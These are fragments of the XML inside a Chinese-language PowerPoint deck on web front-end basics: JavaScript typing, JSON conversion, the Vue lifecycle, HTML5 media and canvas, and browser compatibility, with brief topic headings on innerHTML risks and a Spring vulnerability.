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20" r:id="rId3"/>
    <p:sldId id="793" r:id="rId4"/>
    <p:sldId id="794" r:id="rId6"/>
    <p:sldId id="921" r:id="rId7"/>
    <p:sldId id="1038" r:id="rId8"/>
    <p:sldId id="922" r:id="rId9"/>
    <p:sldId id="925" r:id="rId10"/>
    <p:sldId id="923" r:id="rId11"/>
    <p:sldId id="924" r:id="rId12"/>
    <p:sldId id="926" r:id="rId13"/>
    <p:sldId id="927" r:id="rId14"/>
    <p:sldId id="928" r:id="rId15"/>
    <p:sldId id="929" r:id="rId16"/>
    <p:sldId id="930" r:id="rId17"/>
    <p:sldId id="931" r:id="rId18"/>
    <p:sldId id="932" r:id="rId19"/>
    <p:sldId id="933" r:id="rId20"/>
    <p:sldId id="934" r:id="rId21"/>
    <p:sldId id="935" r:id="rId22"/>
    <p:sldId id="936" r:id="rId23"/>
    <p:sldId id="937" r:id="rId24"/>
    <p:sldId id="938" r:id="rId25"/>
    <p:sldId id="939" r:id="rId26"/>
    <p:sldId id="940" r:id="rId27"/>
    <p:sldId id="1025" r:id="rId28"/>
    <p:sldId id="1026" r:id="rId29"/>
    <p:sldId id="1027" r:id="rId30"/>
    <p:sldId id="941" r:id="rId31"/>
    <p:sldId id="1028" r:id="rId32"/>
    <p:sldId id="1029" r:id="rId33"/>
    <p:sldId id="1030" r:id="rId34"/>
    <p:sldId id="942" r:id="rId35"/>
    <p:sldId id="1031" r:id="rId36"/>
    <p:sldId id="1032" r:id="rId37"/>
    <p:sldId id="943" r:id="rId38"/>
    <p:sldId id="1035" r:id="rId39"/>
    <p:sldId id="1036" r:id="rId40"/>
    <p:sldId id="1037" r:id="rId41"/>
    <p:sldId id="944" r:id="rId42"/>
    <p:sldId id="946" r:id="rId43"/>
    <p:sldId id="947" r:id="rId44"/>
    <p:sldId id="1039" r:id="rId45"/>
    <p:sldId id="1040" r:id="rId46"/>
    <p:sldId id="1041" r:id="rId47"/>
    <p:sldId id="1042" r:id="rId48"/>
    <p:sldId id="948" r:id="rId49"/>
    <p:sldId id="1043" r:id="rId50"/>
    <p:sldId id="1044" r:id="rId51"/>
    <p:sldId id="1045" r:id="rId52"/>
    <p:sldId id="1047" r:id="rId53"/>
    <p:sldId id="1048" r:id="rId54"/>
    <p:sldId id="1049" r:id="rId55"/>
    <p:sldId id="949" r:id="rId56"/>
    <p:sldId id="1051" r:id="rId57"/>
    <p:sldId id="1052" r:id="rId58"/>
    <p:sldId id="1050" r:id="rId59"/>
    <p:sldId id="1057" r:id="rId60"/>
    <p:sldId id="1058" r:id="rId61"/>
    <p:sldId id="1059" r:id="rId62"/>
    <p:sldId id="950" r:id="rId63"/>
    <p:sldId id="1053" r:id="rId64"/>
    <p:sldId id="1054" r:id="rId65"/>
    <p:sldId id="1055" r:id="rId66"/>
    <p:sldId id="1056" r:id="rId67"/>
    <p:sldId id="951" r:id="rId68"/>
    <p:sldId id="1081" r:id="rId69"/>
    <p:sldId id="1082" r:id="rId70"/>
    <p:sldId id="1083" r:id="rId71"/>
    <p:sldId id="1084" r:id="rId72"/>
    <p:sldId id="1085" r:id="rId73"/>
    <p:sldId id="952" r:id="rId74"/>
    <p:sldId id="1193" r:id="rId75"/>
    <p:sldId id="1194" r:id="rId76"/>
    <p:sldId id="1195" r:id="rId77"/>
    <p:sldId id="1196" r:id="rId78"/>
    <p:sldId id="953" r:id="rId79"/>
    <p:sldId id="1060" r:id="rId80"/>
    <p:sldId id="1061" r:id="rId81"/>
    <p:sldId id="1062" r:id="rId82"/>
    <p:sldId id="1063" r:id="rId83"/>
    <p:sldId id="1064" r:id="rId84"/>
    <p:sldId id="1065" r:id="rId85"/>
    <p:sldId id="1066" r:id="rId86"/>
    <p:sldId id="1067" r:id="rId87"/>
    <p:sldId id="1068" r:id="rId88"/>
    <p:sldId id="1069" r:id="rId89"/>
    <p:sldId id="1070" r:id="rId90"/>
    <p:sldId id="1073" r:id="rId91"/>
    <p:sldId id="1074" r:id="rId92"/>
    <p:sldId id="1075" r:id="rId93"/>
    <p:sldId id="1076" r:id="rId94"/>
    <p:sldId id="1077" r:id="rId95"/>
    <p:sldId id="1078" r:id="rId96"/>
    <p:sldId id="1079" r:id="rId97"/>
    <p:sldId id="1080" r:id="rId98"/>
    <p:sldId id="920" r:id="rId99"/>
    <p:sldId id="795" r:id="rId100"/>
    <p:sldId id="800" r:id="rId101"/>
    <p:sldId id="813" r:id="rId102"/>
    <p:sldId id="814" r:id="rId103"/>
    <p:sldId id="815" r:id="rId104"/>
    <p:sldId id="816" r:id="rId105"/>
    <p:sldId id="817" r:id="rId106"/>
    <p:sldId id="818" r:id="rId107"/>
    <p:sldId id="796" r:id="rId108"/>
    <p:sldId id="801" r:id="rId109"/>
    <p:sldId id="819" r:id="rId110"/>
    <p:sldId id="820" r:id="rId111"/>
    <p:sldId id="864" r:id="rId112"/>
    <p:sldId id="865" r:id="rId113"/>
    <p:sldId id="866" r:id="rId114"/>
    <p:sldId id="834" r:id="rId115"/>
    <p:sldId id="836" r:id="rId116"/>
    <p:sldId id="835" r:id="rId117"/>
    <p:sldId id="837" r:id="rId118"/>
    <p:sldId id="862" r:id="rId119"/>
    <p:sldId id="863" r:id="rId120"/>
    <p:sldId id="867" r:id="rId121"/>
    <p:sldId id="868" r:id="rId122"/>
    <p:sldId id="869" r:id="rId123"/>
    <p:sldId id="841" r:id="rId124"/>
    <p:sldId id="870" r:id="rId125"/>
    <p:sldId id="871" r:id="rId126"/>
    <p:sldId id="872" r:id="rId127"/>
    <p:sldId id="1206" r:id="rId128"/>
    <p:sldId id="874" r:id="rId129"/>
    <p:sldId id="875" r:id="rId130"/>
    <p:sldId id="876" r:id="rId131"/>
    <p:sldId id="797" r:id="rId132"/>
    <p:sldId id="843" r:id="rId133"/>
    <p:sldId id="845" r:id="rId134"/>
    <p:sldId id="877" r:id="rId135"/>
    <p:sldId id="844" r:id="rId136"/>
    <p:sldId id="846" r:id="rId137"/>
    <p:sldId id="847" r:id="rId138"/>
    <p:sldId id="848" r:id="rId139"/>
    <p:sldId id="849" r:id="rId140"/>
    <p:sldId id="850" r:id="rId141"/>
    <p:sldId id="851" r:id="rId142"/>
    <p:sldId id="878" r:id="rId143"/>
    <p:sldId id="879" r:id="rId144"/>
    <p:sldId id="880" r:id="rId145"/>
    <p:sldId id="882" r:id="rId146"/>
    <p:sldId id="883" r:id="rId147"/>
    <p:sldId id="884" r:id="rId148"/>
    <p:sldId id="885" r:id="rId149"/>
    <p:sldId id="887" r:id="rId150"/>
    <p:sldId id="890" r:id="rId151"/>
    <p:sldId id="891" r:id="rId152"/>
    <p:sldId id="892" r:id="rId153"/>
    <p:sldId id="893" r:id="rId154"/>
    <p:sldId id="1205" r:id="rId155"/>
    <p:sldId id="894" r:id="rId156"/>
    <p:sldId id="798" r:id="rId157"/>
    <p:sldId id="803" r:id="rId158"/>
    <p:sldId id="804" r:id="rId159"/>
    <p:sldId id="805" r:id="rId160"/>
    <p:sldId id="806" r:id="rId161"/>
    <p:sldId id="807" r:id="rId162"/>
    <p:sldId id="812" r:id="rId163"/>
    <p:sldId id="318" r:id="rId164"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId1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4" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="38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14"/>
        <p:guide pos="387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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag46.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.xml"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.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Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>innerhtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 危害</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Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是强类型语言，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是弱类型语言。基于这个标准出现这门语言。跨平台就是不同操作系统都能使用，面向对象就是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的思想</a:t>
            </a:r>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插件 增加交互方式内容</a:t>
            </a:r>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几年前我们都用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，现在都是用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsonStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>JSON.stringify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>反之，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>JSON.parse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>userStr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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框架有什么用呢，简化我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的变成</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>响应式原理</a:t>
            </a:r>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Vue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>创建到销毁的过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，四个阶段，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>创建阶段，挂载阶段，更新阶段，销毁阶段。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" u="none" strike="noStrike"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Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 漏洞 造成示例影响</a:t>
            </a:r>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目前使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 与之前版本有什么区别，兼容性。使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的原因</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第五代版本</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多媒体支持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原生支持音频（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;audio&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）和视频（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;video&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）播放，无需依赖第三方插件如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>允许使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>进行绘图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:latin typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&lt;canvas&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>将给浏览器带来直接在上面绘制矢量图的能力，这意味着用户可以脱离</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-GB" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>直接在浏览器中显示图形或动画。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"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跨平台：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以在各种设备和平台上运行，包括桌面电脑、笔记本电脑、平板电脑、智能手机等。这使得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>可以一次开发，多平台部署</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"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effectLst/>
              </a:rPr>
              <a:t>兼容性上：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>主流的现代浏览器如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Chrome</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>谷歌</a:t>
            </a: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Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>火狐</a:t>
            </a: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Safari</a:t>
            </a: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Edge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>的支持非常好，可以很好地呈现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> HTML5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1800" dirty="0">
                <a:effectLst/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>页面的各种功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="4000" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.pn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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此处编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="灯片编号占位符 34"/>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9.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0"/>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image" Target="../media/image8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image" Target="../media/image9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image" Target="../media/image93.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xml"/><Relationship Id="rId1"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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image95.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image" Target="../media/image97.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image98.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image101.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image103.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image104.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image105.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image106.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image110.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image111.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127.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image113.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image112.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image114.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image116.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image117.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image118.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xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image119.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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 